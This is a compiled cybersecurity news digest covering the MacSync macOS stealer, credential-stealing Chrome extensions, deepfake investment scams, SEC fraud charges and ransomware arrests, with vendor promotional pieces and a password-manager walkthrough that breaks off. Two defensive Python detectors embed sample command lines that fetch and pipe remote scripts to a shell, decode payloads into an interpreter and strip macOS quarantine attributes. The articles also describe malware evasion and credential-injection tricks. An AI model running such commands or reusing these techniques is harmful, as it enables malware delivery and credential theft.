2025-12-25 AI startup news

New MacSync macOS Stealer Uses Signed App to Bypass Apple Gatekeeper

Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that is delivered via a digitally signed, notarized Swift application masquerading as a messaging app installer in order to bypass Apple’s Gatekeeper checks. “Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more deceptive, hands-off approach,” Jamf researcher Thijs Xhaflaire said. The Apple device management and security firm said the latest version is distributed as a code-signed and notarized Swift application inside a disk image (DMG) named “zk-call-messenger-installer-3.9.2-lts.dmg” hosted at “zkcall[.]net/download.” Because it is signed and notarized, it can run without being blocked or flagged by built-in controls such as Gatekeeper or XProtect. Even so, the installer displays instructions prompting users to right-click and open the app, a common tactic used to sidestep such safeguards.

Apple has since revoked the code signing certificate. The Swift-based dropper runs a series of checks before downloading and executing an encoded script through a helper component: it verifies internet connectivity, enforces a minimum interval of roughly 3600 seconds between runs as a rate limit, strips quarantine attributes, and validates the file before execution. “Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” Xhaflaire explained.

“Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like --noproxy have been introduced.” “These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection.” Another evasion technique in the campaign is an unusually large DMG: the file is padded to 25.5 MB with unrelated embedded PDF documents, a common trick for exceeding the size limits of file scanners. The Base64-encoded payload, once decoded, is MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync, per MacPaw’s Moonlock Lab, ships with a fully featured Go-based agent that goes beyond simple data theft and provides remote command-and-control capabilities. Code-signed malicious DMG files mimicking Google Meet have also been observed delivering other macOS stealers such as Odyssey.
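The dropper chain described above (quarantine attribute removal, a fetch with split curl flags and --noproxy, and a decoded script handed to an interpreter) is straightforward to hunt for in process-execution telemetry, provided curl’s grouped short options are normalised before matching so that “-fsSL” and “-fL -sS” hit the same rule. The following is an added example and is not Jamf’s detection content or code from the sample; the event lines, parent-process names and example.invalid URLs are constructed, and the “parent -> command line” input shape is an assumption that any EDR feed exposing full command lines can be mapped onto.

```python
"""Hunt for the MacSync-style dropper chain in process-execution telemetry.

Added example, not Jamf's detection content. Each event is a constructed
sample in the shape "<parent> -> <command line>" (an assumed format); any
EDR or unified-log feed that yields full command lines can be mapped onto it.
"""
import re
import shlex

QUARANTINE_ATTR = "com.apple.quarantine"
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}


def curl_short_flags(argv):
    """Expand grouped short options (-fsSL -> -f -s -S -L); keep long options as-is."""
    flags = set()
    for tok in argv[1:]:
        if tok.startswith("--"):
            flags.add(tok.split("=", 1)[0])
        elif tok.startswith("-") and len(tok) > 1:
            flags.update("-" + c for c in tok[1:])
    return flags


def classify(cmdline):
    """Return the behaviour tags a single command line triggers, in order found."""
    tags = []
    # A pipeline may chain several commands; inspect every stage separately.
    stages = [s.strip() for s in re.split(r"\|\||&&|\||;", cmdline) if s.strip()]
    for stage in stages:
        try:
            argv = shlex.split(stage)
        except ValueError:  # unbalanced quotes: skip the stage rather than crash the hunt
            continue
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "xattr" and "-d" in argv and QUARANTINE_ATTR in argv:
            tags.append("quarantine_removed")
        elif prog == "curl":
            flags = curl_short_flags(argv)
            # fail-fast + follow redirects + silent, however the letters are grouped
            if {"-f", "-L"} <= flags and ({"-s", "-S"} & flags or "--silent" in flags):
                tags.append("curl_silent_fetch")
            if "--noproxy" in flags:
                tags.append("curl_noproxy")
        elif prog == "base64" and ({"-d", "-D", "--decode"} & set(argv)):
            tags.append("base64_decode")
    # Decoded content handed straight to an interpreter is the execution step.
    downstream = [s.split()[0].rsplit("/", 1)[-1] for s in stages[1:] if s.split()]
    if "base64_decode" in tags and INTERPRETERS & set(downstream):
        tags.append("decode_to_interpreter")
    return tags


def hunt(events, threshold=3):
    """Group tags by parent process; report parents that show most of the chain."""
    by_parent = {}
    for line in events:
        parent, _, cmd = line.partition(" -> ")
        by_parent.setdefault(parent, set()).update(classify(cmd))
    return {p: sorted(t) for p, t in by_parent.items() if len(t) >= threshold}


# Constructed sample events (not telemetry from the real sample); example.invalid
# is a reserved domain that never resolves.
SAMPLE_EVENTS = [
    "helper -> xattr -d com.apple.quarantine /tmp/stage2",
    "helper -> curl -fL -sS --noproxy '*' -o /tmp/stage2.b64 https://example.invalid/p",
    "helper -> base64 -d /tmp/stage2.b64 | /bin/sh",
    "bash -> curl -fsSL https://example.invalid/install.sh | sh",
    "brew -> xattr -l /Applications/Foo.app",
]

if __name__ == "__main__":
    for parent, tags in hunt(SAMPLE_EVENTS).items():
        print(parent, tags)
```

A lone `curl -fsSL ... | sh` scores a single tag and is not reported, since that shape is common in legitimate install scripts; the dropper parent accumulates the quarantine strip, the no-proxy fetch and the decode-to-interpreter step, which together clear the threshold.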

That said, threat actors have continued to rely on unsigned disk images to deliver DigitStealer as recently as last month. “This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” Jamf said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Nomani Investment Scam Surges 62% Using AI Deepfake Ads on Social Media

The fraudulent investment scheme known as Nomani has grown by 62%, according to data from ESET, as campaigns distributing the threat have expanded beyond Facebook to other social media platforms such as YouTube. The Slovak cybersecurity company said it blocked over 64,000 unique URLs associated with the threat this year, with most detections originating from Czechia, Japan, Slovakia, Spain, and Poland. Nomani was first documented by ESET in December 2024 as a scheme that uses social media malvertising, company-branded posts, and artificial intelligence (AI)-generated video testimonials to deceive users into investing in non-existent investment products that promise significant returns.

When victims request a payout of the promised profits, they are asked to pay additional fees or hand over more personal information, such as ID documents and credit card details. As with other investment scams of this kind, the end goal is to extract as much money as possible. It does not end there: the fraudsters then target the same victims again with Europol- and INTERPOL-themed lures on social media that promise help recovering the stolen funds, costing them even more. ESET said the scam has since received notable upgrades, including more realistic AI-generated videos that make the deception harder for prospective targets to spot.

“Deepfakes of popular personalities, used as initial hooks for phishing forms or websites, now use higher resolution, have significantly reduced unnatural movements and breathing, and have also improved their A/V sync,” the company noted. The fabricated content often leverages topical events or personalities prominent in public discourse to lend credibility to the scheme. In one case observed in Czechia, a bogus news article falsely claimed the government was investing through one of the scam cryptocurrency platforms and generating substantial returns. To keep malicious ads from being caught by the platform’s review systems, the threat actors run each campaign for only a few hours.

Another important change is redirecting visitors who do not match the targeting criteria to benign cloaking pages instead of the external phishing forms. “To further lower their footprint, attackers increasingly abuse legitimate tools offered by the social media ad framework, such as forms and surveys instead of external webpages, to harvest victims’ information,” ESET said. The templates used to generate phishing pages have also improved, with signs that AI tools were used to write the HTML; that assessment rests on checklist-style checkboxes left behind in source code comments.

ESET also found GitHub repositories hosting such investment scam templates that were published by Russian and/or Ukrainian users. Despite these changes, Nomani detections dropped in the second half of 2025, an indication that the attackers are likely being forced to revamp their tactics in the face of increased law enforcement efforts against such scams. “On the bright side, although overall detections are up compared to 2024, there’s a hint of improvement, as H2 2025 detections have declined by 37% compared to H1 2025,” ESET said. The disclosure coincides with a Reuters investigation that found 19% of Meta’s $18 billion in ad sales in China last year came from ads for scams, illegal gambling, pornography, and other banned content run by the company’s ad agency partners in the country.

Some of these agencies allow businesses to run banned advertisements. Following the report, Meta is said to have put the program under review. The latest report comes on the heels of an earlier Reuters report revealing that Meta projected about 10% of its 2024 global revenue, roughly $16 billion, would come from such ads, including those run by the threat actors behind Nomani, quantifying the sheer scale of the problem.


Attacks are Evolving: 3 Ways to Protect Your Business in 2026

Every year, cybercriminals find new ways to steal money and data from businesses. Breaching a business network, extracting sensitive data, and selling it on the dark web has become a reliable payday. But in 2025, the data breaches that affected small and medium-sized businesses (SMBs) challenged the received wisdom about exactly which types of businesses cybercriminals are targeting. This article outlines the lessons from key data breaches in 2025 as well as the most effective ways for SMBs to protect themselves in the coming year.

Examining the 2025 data breaches

Prior to 2025, large businesses were popular targets for hackers because of their large pools of resources. It was assumed that smaller businesses simply weren’t as vulnerable to cyberattacks because there was less value in attacking them. But new security research from the Data Breach Observatory shows that is changing: small and medium-sized businesses are now more likely to become a target. The shift in tactics has been driven by large businesses investing in their cybersecurity and refusing to pay ransoms.

Cybercriminals are less likely to extract anything of value by attacking those businesses, so they are turning to smaller ones instead. While the payday from an individual SMB may be smaller, a higher volume of attacks makes up the shortfall. Smaller businesses have fewer resources to protect their networks and so have become more reliable targets. Four in five small businesses have suffered a recent data breach.

By examining some of these data breaches and the companies they affected, a pattern emerges and failings can be identified. Here are three key SMB data breaches from 2025:

Tracelo: More than 1.4 million records stolen from this American mobile geolocation business appeared on the dark web following an attack by a hacker known as Satanic. Customer names, addresses, phone numbers, email addresses, and passwords were all put up for sale.

PhoneMondo: This German telecommunications company was infiltrated and had more than 10.5 million records stolen and posted online. Customer names, dates of birth, addresses, phone numbers, email addresses, usernames, passwords, and IBANs all made it onto the dark web.

SkilloVilla: The 60-person team behind this Indian edtech platform was not able to protect the extensive customer data the platform collected, and more than 33 million records were leaked on the dark web. Customer names, addresses, phone numbers, and email addresses have all been spotted online.

What can we learn?

Looking at these particular breaches and the wider data breach landscape, several trends shaped 2025. SMBs were the number one target for hackers in 2025, accounting for 70.5% of the data breaches recorded by the Data Breach Observatory, meaning companies with between 1 and 249 employees were the most frequently breached throughout the year. Retail, tech, and media/entertainment businesses were targeted most often. Names and contact information are the most common records to appear on the dark web, which raises the risk of phishing attacks against employees.

Names and emails appeared in 9 out of 10 data breaches. With these trends in mind, it’s likely that hackers will continue targeting SMBs in the new year. If your organization falls into this category, your risk of a data breach could be higher. It’s not inevitable, however.

By considering your business’s sensitive data, how it is stored, and what you use to protect it, you can secure your organization.

How to avoid data breaches in 2026

Avoiding a data breach doesn’t have to be costly or complicated, as long as your business takes the right approach and finds the right tools.

Employ two-factor authentication

If all it takes to gain access to one of your business tools is a username and a password, your network is significantly easier to breach. Two-factor authentication (2FA) makes it harder for unauthorized individuals to gain access.

By introducing a secondary authentication method, such as a one-time password (OTP), a security key, or a biometric login, you raise the bar for an attacker: a stolen or guessed password alone is no longer enough to log in. Phishing-resistant factors such as FIDO2 security keys or passkeys are preferable to OTP codes, which can themselves be phished or relayed.

Secure access control to your network

The principle of least privilege is a method for deciding who has access to which business tools and data. It dictates that any given team member should have access to strictly the information they need to perform their role and nothing else. This approach protects your organization by limiting what any single compromised account can reach.

Once access has been granted only to the team members who need it, that access needs to be secured with good password hygiene. This includes creating strong passwords, not reusing passwords across accounts, and ensuring that your business is notified if any of its data appears on the dark web. Strong, enforceable password policies support good password hygiene, and a password manager or similar service can keep the dark web under regular watch for business data.

Store sensitive data securely

Leaked passwords and email addresses increase the risk that your employees will be targeted by phishing attacks or have their accounts compromised.

Even a single compromised account can lead to a data breach. Create a single, secure repository for every business credential by adopting a business password manager. With a password manager, every team member can generate strong passwords that meet your business’s password policy, autofill them on frequently visited websites and apps, and share credentials securely when needed, closing off these vital entry points into your business network.

This article is a contributed piece from one of our valued partners.

SEC Files Charges Over $14 Million Crypto Scam Using Fake AI-Themed Investment Tips

The U.S. Securities and Exchange Commission (SEC) has filed charges against multiple companies for their alleged involvement in an elaborate cryptocurrency scam that swindled more than $14 million from retail investors. The complaint names crypto asset trading platforms Morocoin Tech Corp., Berge Blockchain Technology Co., Ltd., and Cirkor Inc., as well as investment clubs AI Wealth Inc., Lane Wealth Inc., AI Investment Education Foundation (AIIEF) Ltd., and Zenith Asset Tech Foundation. The SEC said the scam unfolded as a multi-step fraud that enticed users with social media ads and built trust through group chats in which the scammers posed as financial professionals and promised returns from artificial intelligence (AI)-generated investment tips.

The fraudsters then convinced victims to move their funds onto fake cryptocurrency trading platforms, where the money was taken. According to the SEC, AI Wealth, Lane Wealth, AIIEF, and Zenith operated investment clubs on messaging apps such as WhatsApp, into which retail investors were lured via social media ads. AI Wealth and Lane Wealth ran their WhatsApp groups from at least January 2024 to June 2024, while AIIEF and Zenith operated from at least July 2024 to January 2025. The complaint alleges that an unnamed individual based in Beijing, China, paid for the registrations of AI Wealth, Lane Wealth, and Zenith.

The details of the cryptocurrency platforms are as follows -

Morocoin Tech Corp. - Established around December 2023 and accessible at h5.morocoin[.]top (currently delinquent)
Berge Blockchain Technology Co., Ltd. - Established around June 2022 and accessible at www.bergev[.]org (currently delinquent)
Cirkor Inc. - Established around May 2024 and accessible at www.cirkortrading[.]com (administratively dissolved in October 2025)

Each of the investment clubs included a “professor” who sent investors WhatsApp updates on macroeconomic conditions or commentary on stocks, and an “assistant” who handled day-to-day interactions with participants.

These personas also sent trade recommendations that they falsely claimed were based on AI-generated “signals.” “The clubs gained investors’ confidence with supposedly AI-generated investment tips before luring investors to open and fund accounts on purported crypto asset trading platforms Morocoin, Berge, and Cirkor, which falsely claimed to have government licenses, as alleged,” the SEC said. “The investment clubs and platforms then allegedly offered ‘Security Token Offerings’ that were purportedly issued by legitimate businesses. In reality, no trading took place on the trading platforms, which were fake, and the Security Token Offerings and their purported issuing companies did not exist.” The AI Wealth and Lane Wealth WhatsApp groups are said to have promoted an STO of a crypto asset called SCT, purportedly issued by a company named SatCommTech. Likewise, the AIIEF and Zenith WhatsApp groups advertised an STO of another crypto asset called HMB, purportedly issued by HumanBlock.

Both SatCommTech and HumanBlock have been identified as fictitious. To make matters worse, when investors attempted to withdraw their funds, the bogus platforms defrauded them a second time by demanding that they pay advance fees to gain access to money in their accounts. In the end, the platforms cut off investors’ access to their services. The ill-gotten proceeds, totaling at least $14 million, were moved overseas through a web of bank accounts and crypto asset wallets, in some cases through accounts held by Chinese or Burmese individuals located in Southeast Asia.

Of the total misappropriated funds, cryptocurrency assets account for at least $7.4 million, and fiat currency accounts for $6.6 million. In one case, a Morocoin investor made seven separate wires amounting to more than $1 million to accounts in China and Hong Kong. In another, a Cirkor investor wired over $1.4 million to a bank in Indonesia. There have also been multiple reports on Reddit about individuals losing their money to the scam , with the AIIEF using names like “Richard Dill” and “Daisy Akemi” for professors and assistants.

The defendants have been charged with violating the anti-fraud provisions of the Securities Act of 1933 and the Securities Exchange Act of 1934. The SEC is seeking permanent injunctions, civil penalties, and disgorgement of the ill-gotten gains with prejudgment interest. “This matter highlights an all-too-common form of investment scam that is being used to target U.S. retail investors with devastating consequences,” said Laura D’Allaird, Chief of the Cyber and Emerging Technologies Unit.

“Fraud is fraud, and we will vigorously pursue securities fraud that harms retail investors.”

Italy Fines Apple €98.6 Million Over ATT Rules Limiting App Store Competition

Apple has been fined €98.6 million ($116 million) by Italy’s antitrust authority, which found that the company’s App Tracking Transparency (ATT) privacy framework restricted App Store competition. The Italian Competition Authority (Autorità Garante della Concorrenza e del Mercato, or AGCM) said the company’s “absolute dominant position” in app distribution allowed it to “unilaterally impose” the ATT rules on third-party app developers without consulting them beforehand. The investigation was launched in May 2023. The AGCM said it is not questioning Apple’s decision to adopt safeguards that enhance users’ privacy on iOS; rather, it takes issue with consent requirements that are excessively burdensome for developers and “disproportionate” to ATT’s stated objectives.

Specifically, ATT requires developers to serve both an ATT prompt and a GDPR consent prompt to iPhone and iPad users in the E.U. before processing their data for personalized ads, whereas Apple’s own apps and services can obtain the equivalent permission in a single tap. “In particular, third-party app developers are required to obtain specific consent for the collection and linking of data for advertising purposes through Apple’s ATT prompt,” AGCM said.

“However, such a prompt does not meet privacy legislation requirements, forcing developers to double the consent request for the same purpose.” The authority also said the double consent requirement that results from ATT harms third-party developers who rely on advertising, adding, “Apple should have ensured the same level of privacy protection for users by allowing developers to obtain consent to profiling in a single ‘Personalized Advertising’ prompt.” In a statement shared with Reuters, Apple said it will appeal the decision and reiterated its commitment “to defend strong privacy protections,” adding that the rules apply equally to all developers, including Apple. Apple introduced ATT in 2021 as a way for mobile apps to seek users’ explicit consent before accessing the device’s unique advertising identifier to track them across apps and websites for targeted advertising. This is not the first time the framework has run afoul of competition authorities.

In March 2025, the company was fined €150 million ($162 million) by France’s competition watchdog for abusing its dominant position in mobile app advertising through ATT. Apple is also facing similar probes in Poland and Romania. Earlier this month, Germany’s antitrust authority said it was testing Apple’s proposed changes to ATT, which include changes to the text and formatting of the consent prompt while maintaining “core user benefits.” The company is said to have agreed to introduce neutral consent prompts for both its own services and third-party apps, and to simplify the consent process so that developers can obtain user permission in a manner that complies with data protection law.


How AI and Zero Trust Work Together to Catch Attacks With No Files or Indicators

There’s one constant in cybersecurity: the threat landscape continues to rapidly evolve. To bolster their organizations’ resilience, defenders need proactive visibility and tooling across their endpoints, developer environments, and crypto stack to stay several steps ahead of attackers. In this webinar, experts from the Zscaler Internet Access product team cover the next major security challenges and how enterprises can best respond to them:

“Living off the Land” attacks: Today’s attackers combine malware with legitimate system tools like PowerShell, WMI, or RDP. File-based detection alone misses threats that blend in with trusted processes. Learn how and why endpoint visibility into file-based threats, apps, and process behaviors is essential.

Fileless “last mile” reassembly attacks: Legacy security tools are ineffective against fileless attacks, including those that use only obfuscated HTML and JavaScript. Learn how a cloud-native antimalware engine that emulates malicious scripting and reassembles the resulting executable in isolation can stop malicious files from ever reaching an endpoint.

Securing developer environments: Developers are building and deploying applications faster than ever, but third-party repositories and other open-source CI/CD tools can contain malicious code and vulnerabilities that compromise your organization’s security. Inspecting encrypted traffic in developer environments can identify and defeat would-be threats. Learn how to secure development workflows with automated TLS/SSL inspection and code sandboxing.

You’ll see how Zscaler Internet Access’s capabilities, built on a foundation of zero trust and AI-powered protection, provide SOC and IT teams with the preventative tooling and visibility needed to defend against emerging threats and proactively fortify security posture to protect users, devices, and data.

Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites

Cybersecurity researchers have discovered two malicious Google Chrome extensions with the same name, published by the same developer, that intercept traffic and capture user credentials. The extensions are advertised as a “multi-location network speed test plug-in” for developers and foreign trade personnel, and both were still available for download at the time of writing. The details of the extensions are as follows -

Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj) - 2,000 users (published on November 26, 2017)
Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd) - 180 users (published on April 27, 2023)

“Users pay subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40 to $13.50 USD), believing they’re purchasing a legitimate VPN service, but both variants perform identical malicious operations,” Socket security researcher Kush Pandya said.

“Behind the subscription facade, the extensions execute complete traffic interception through authentication credential injection, operate as man-in-the-middle proxies, and continuously exfiltrate user data to the threat actor’s C2 [command-and-control] server.” Once unsuspecting users make the payment, they receive VIP status and the extensions auto-enable “smarty” proxy mode, which routes traffic from over 170 targeted domains through the C2 infrastructure. The extensions work as advertised to reinforce the illusion of a functional product. They perform actual latency tests on proxy servers and display connection status, while keeping users in the dark about their main goal, which is to intercept network traffic and steal credentials. This involves malicious modifications prepended to two JavaScript libraries, namely, jquery-1.12.2.min.js and scripts.js, that come bundled with the extensions.

The code registers a listener on chrome.webRequest.onAuthRequired that automatically injects hard-coded proxy credentials (topfany / 963852wei) into every HTTP authentication challenge on every website. “When any website or service requests HTTP authentication (Basic Auth, Digest Auth, or proxy authentication), this listener fires before the browser displays a credential prompt,” Pandya explained. “It immediately responds with the hardcoded proxy credentials, completely transparent to the user. The asyncBlocking mode ensures synchronous credential injection, preventing any user interaction.” Once users authenticate to a proxy server, the extension configures Chrome’s proxy settings using a Proxy Auto-Configuration (PAC) script that implements three modes -

close, which disables the proxy feature
always, which routes all web traffic through the proxy
smarty, which routes a hard-coded list of more than 170 high-value domains through the proxy

The list of domains includes developer platforms (GitHub, Stack Overflow, Docker), cloud services (Amazon Web Services, DigitalOcean, Microsoft Azure), enterprise solutions (Cisco, IBM, VMware), social media (Facebook, Instagram, Twitter), and adult content sites.

The inclusion of pornographic sites is likely an attempt to blackmail victims, Socket theorized. The net result of this behavior is that user web traffic is routed through threat actor-controlled proxies while the extension maintains a 60-second heartbeat to its C2 server at phantomshuttle[.]space, a domain that remains operational. It also grants the attacker a “man-in-the-middle” (MitM) position to capture traffic, manipulate responses, and inject arbitrary payloads. More importantly, the heartbeat message transmits a VIP user’s email, password in plaintext, and version number to an external server via an HTTP GET request every five minutes for continuous credential exfiltration and session monitoring.

“The combination of heartbeat exfiltration (credentials and metadata) plus proxy MitM (real-time traffic capture) provides comprehensive data theft capabilities operating continuously while the extension remains active,” Socket said. Put differently, the extension captures passwords, credit card numbers, authentication cookies, browsing history, form data, API keys, and access tokens from users accessing the targeted domains while VIP mode is active. What’s more, the theft of developer secrets could pave the way for supply chain attacks. It’s currently not known who is behind the eight-year-old operation, but the use of Chinese language in the extension description, the presence of Alipay/WeChat Pay integration to make payments, and the use of Alibaba Cloud to host the C2 domain points to a China-based operation.

“The subscription model creates victim retention while generating revenue, and the professional infrastructure with payment integration presents a facade of legitimacy,” Socket said. “Users believe they’re purchasing a VPN service while unknowingly enabling complete traffic compromise.” The findings highlight how browser-based extensions are becoming an unmanaged risk layer for enterprises. Users who have installed the extensions are advised to remove them as soon as possible. For security teams, it’s essential to deploy extension allowlisting, monitor for extensions with subscription payment systems combined with proxy permissions, and implement network monitoring for suspicious proxy authentication attempts.
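The allowlisting and monitoring advice above is easier to act on with a concrete triage check. The following is an added example, not Socket’s tooling or the extension’s code: it scans an unpacked extension for the combination the report describes (proxy-capable permissions, a chrome.webRequest.onAuthRequired listener answering with a hard-coded authCredentials literal, and a chrome.proxy.settings.set call that installs a PAC script over a domain list). The manifest and background script it runs against are constructed stand-ins, and the regexes are a heuristic rather than a JavaScript parser.

```python
"""Static triage of an unpacked Chrome extension for the proxy-credential
hijack pattern. Added example; the sample manifest and background script
below are constructed, not the Phantom Shuttle files.
"""
import json
import re

PROXY_PERMS = ("proxy", "webRequest", "webRequestAuthProvider", "webRequestBlocking")

# Indicators evaluated over the concatenated script source.
INDICATORS = {
    "onAuthRequired_listener": re.compile(r"chrome\.webRequest\.onAuthRequired\.addListener\s*\("),
    "asyncBlocking_mode": re.compile(r"[\"']asyncBlocking[\"']"),
    "hardcoded_authCredentials": re.compile(
        r"authCredentials\s*:\s*\{\s*username\s*:\s*[\"'][^\"']*[\"']\s*,\s*password\s*:\s*[\"'][^\"']*[\"']"
    ),
    "pac_proxy_set": re.compile(r"chrome\.proxy\.settings\.set\s*\([\s\S]*?pacScript"),
}


def extract_proxied_hosts(source):
    """Return the literal host array handed to the PAC builder, if there is one."""
    m = re.search(r"\b(?:hosts|domains)\s*=\s*\[([^\]]*)\]", source)
    if not m:
        return []
    return re.findall(r"[\"']([^\"']+)[\"']", m.group(1))


def triage_extension(manifest_json, scripts):
    """Score one extension; returns findings, proxied hosts and a verdict."""
    manifest = json.loads(manifest_json)
    declared = set(manifest.get("permissions", []))
    source = "\n".join(scripts)
    findings = []

    perms = [p for p in PROXY_PERMS if p in declared]
    if perms:
        findings.append("proxy-capable permissions: " + ", ".join(perms))
    for name, rx in INDICATORS.items():
        if rx.search(source):
            findings.append(name)
    hosts = extract_proxied_hosts(source)
    if hosts:
        findings.append(f"PAC routes {len(hosts)} host(s) through the proxy")

    # The red flag is the combination: the proxy permission, an auth listener,
    # and a credential literal to answer with. Any one alone is common in
    # legitimate proxy helpers, so those only earn a "review".
    injection = (
        "proxy" in declared
        and INDICATORS["onAuthRequired_listener"].search(source) is not None
        and INDICATORS["hardcoded_authCredentials"].search(source) is not None
    )
    verdict = "block" if injection else ("review" if findings else "ok")
    return {"findings": findings, "hosts": hosts, "credential_injection": injection, "verdict": verdict}


# Constructed sample: a subscription "speed test" extension in the shape the
# report describes. Not the real extension's files.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Speed Test Helper (constructed sample)",
    "permissions": ["proxy", "webRequest", "webRequestAuthProvider", "storage"],
    "host_permissions": ["<all_urls>"],
})

SAMPLE_BACKGROUND = r"""
const hosts = ["github.com", "stackoverflow.com", "console.aws.amazon.com"];
chrome.webRequest.onAuthRequired.addListener(
  (details, callback) => callback({ authCredentials: { username: "user", password: "pass" } }),
  { urls: ["<all_urls>"] },
  ["asyncBlocking"]
);
chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { data: buildPac(hosts) } }, scope: "regular" });
"""

BENIGN_MANIFEST = json.dumps({"manifest_version": 3, "name": "Notes", "permissions": ["storage"]})
BENIGN_BACKGROUND = "chrome.storage.local.get('notes', console.log);"

if __name__ == "__main__":
    print(triage_extension(SAMPLE_MANIFEST, [SAMPLE_BACKGROUND]))
    print(triage_extension(BENIGN_MANIFEST, [BENIGN_BACKGROUND]))
```

Run it over each unpacked extension directory in a fleet inventory (manifest.json plus every script it references) and feed anything with a "block" verdict into the allowlist review; an extension that declares the proxy permission but carries no credential literal lands in "review", which is the right place for the many legitimate proxy helpers that would otherwise drown the signal.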


INTERPOL Arrests 574 in Africa; Ukrainian Ransomware Affiliate Pleads Guilty

A law enforcement operation coordinated by INTERPOL has led to the recovery of $3 million and the arrest of 574 suspects by authorities from 19 countries, amidst a continued crackdown on cybercrime networks in Africa. The coordinated effort, named Operation Sentinel, took place between October 27 and November 27, 2025, and mainly focused on business email compromise (BEC), digital extortion, and ransomware on the continent. Participating nations included Benin, Botswana, Burkina Faso, Cameroon, Chad, Congo, Djibouti, Democratic Republic of the Congo, Gabon, Ghana, Kenya, Malawi, Nigeria, Senegal, South Africa, South Sudan, Uganda, Zambia, and Zimbabwe. Over the course of the initiative, more than 6,000 malicious links were taken down and six distinct ransomware variants were decrypted.

The names of the ransomware families were not disclosed. The investigated incidents were linked to estimated financial losses exceeding $21 million, INTERPOL added. Multiple suspects have been arrested in connection with a ransomware attack targeting an unnamed Ghanaian financial institution that encrypted 100 terabytes of data and stole about $120,000. In addition, Ghanaian authorities took down a cyber fraud network operating across Ghana and Nigeria that defrauded more than 200 victims of over $400,000 using well-designed websites and mobile apps, which impersonated popular fast-food brands to collect payments for fake orders.

In that case, 10 individuals were apprehended, 100 digital devices were seized, and 30 fraudulent servers were taken offline. Law enforcement in Benin also dismantled 43 malicious domains and 4,318 social media accounts that were used to further extortion schemes and scams; that action culminated in the arrest of 106 people. “The scale and sophistication of cyber attacks across Africa are accelerating, especially against critical sectors like finance and energy,” Neal Jetton, INTERPOL’s director of cybercrime, said.

Operation Sentinel is part of the African Joint Operation against Cybercrime (AFJOC), which aims to enhance the capabilities of national law enforcement agencies in Africa and better disrupt cybercriminal activity in the region.

Ukrainian National Pleads Guilty to Nefilim Ransomware Attacks

The disclosure comes as a 35-year-old from Ukraine pleaded guilty in the U.S. to using Nefilim ransomware to attack companies in the country and elsewhere in his capacity as an affiliate. Artem Aleksandrovych Stryzhak was arrested in Spain in June 2024 and extradited to the U.S. earlier this April. In September, the Justice Department (DoJ) charged another Ukrainian national, Volodymyr Viktorovich Tymoshchuk, for his role as the administrator of the LockerGoga, MegaCortex, and Nefilim ransomware operations between December 2018 and October 2021. Tymoshchuk remains at large, although authorities have announced an $11 million reward for information leading to his arrest or conviction. Tymoshchuk is also on the most wanted lists of both the U.S. Federal Bureau of Investigation (FBI) and the European Union (E.U.). Nefilim’s victims span the U.S., Germany, the Netherlands, Norway, and Switzerland.

“In June 2021, Nefilim administrators gave Stryzhak access to the Nefilim ransomware code in exchange for 20 percent of his ransom proceeds,” the DoJ said. “Stryzhak and others researched potential victims after gaining unauthorized access to their networks, including by using online databases to obtain information about the companies’ net worth, size, and contact information.”

Around July 2021, a Nefilim administrator is said to have encouraged Stryzhak to target companies in the U.S., Canada, and Australia with more than $200 million in annual revenue. Nefilim operated under a double extortion model, pressuring victims to pay up or risk having their stolen data published on a publicly accessible data leak site known as Corporate Leaks that was maintained by the administrators. Stryzhak pleaded guilty to conspiracy to commit fraud related to computers in connection with his Nefilim ransomware activities. He is scheduled to be sentenced on May 6, 2026, and faces a maximum penalty of 10 years in prison.

Passwd: A walkthrough of the Google Workspace Password Manager

Passwd is designed specifically for organizations operating within Google Workspace. Rather than competing as a general consumer password manager, its purpose is narrow and business-focused: secure credential storage, controlled sharing, and seamless Workspace integration. The platform emphasizes practicality over feature overload, aiming to provide a reliable system for teams that already rely on Google’s tools.

Security as the starting point

Encryption and data protection are the basic building blocks of Passwd.

Every credential, file, or sensitive asset is encrypted with AES-256, a widely recognized standard. Encryption happens before storage, keeping data protected throughout its lifecycle. Passwd is based on a zero-knowledge architecture: only the users, not Passwd, are able to access decrypted data, so the service has no visibility of the stored passwords or secrets.

The structure reflects an enterprise mindset:

- Centralized admin control
- Granular, role-based permissions
- Visibility into credential access and changes
- Clear organizational hierarchy

Security assurance is further supported by SOC 2 and GDPR readiness, through documentation and controls for businesses that need to adhere to regulated compliance standards. Along with encryption and zero-knowledge design, these controls reinforce the security posture of the platform. Audit logs and access tracking provide visibility into who has viewed, shared, or changed credentials in the system, which is helpful for compliance, internal audits, and security reviews.

From a reliability perspective, Passwd has minimal downtime; the disruptions caused by Google updates have been short-lived. There have not been any data breaches to date.

Integration designed for Google Workspace

Where most password managers extend across multiple ecosystems, Passwd stays firmly within Google’s.

The platform connects directly to Google Workspace for identity management, making onboarding and administration easier. Because authentication is done via Google OAuth, users sign in with their existing Google accounts, with no new master passwords, credentials, or login systems to maintain. This reduces credential sprawl and eliminates separate password databases. For teams used to Gmail, Drive, Docs, or Google Admin Console, the setup feels intuitively familiar.

Deployments take mere minutes rather than requiring IT restructuring. This focus also creates clarity about the intended environment in which Passwd will operate: Passwd works only inside the Google Workspace ecosystem and cannot be used with external identity providers. Passwd includes Google SSO support, allowing for a passwordless login experience. The service also provides audit logging, which gives administrators insight into who has accessed credentials and when.

Reports indicate it scales effectively for several hundred employees, and its pricing model eliminates additional fees once a company has more than 301 users, making it appealing to larger teams.

How teams use Passwd day-to-day

When activated, Passwd turns into a shared storage system in which groups can securely organize:

- Passwords and logins
- SSH keys
